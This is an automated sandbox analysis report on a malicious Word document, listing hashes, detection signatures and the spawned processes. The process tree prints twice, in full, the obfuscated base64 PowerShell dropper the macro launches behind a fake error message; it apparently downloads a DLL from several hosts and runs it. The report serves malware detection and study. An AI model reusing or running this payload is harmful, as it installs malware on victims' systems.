Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Adjunto K_23165.doc

Overview

General Information

Sample Name:Adjunto K_23165.doc
Analysis ID:369338
MD5:0687dd1c4250049abd4c224485512ffd
SHA1:ec31df47e6c68125b5bdc9355ee5abd23d82fdbe
SHA256:6cb7ee70743f849d9c174fb6b6d672b11d7dcb0f208f869f58deb7956119500e
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4928 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 6276 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA== MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6320 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 6388 cmdline: POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA== 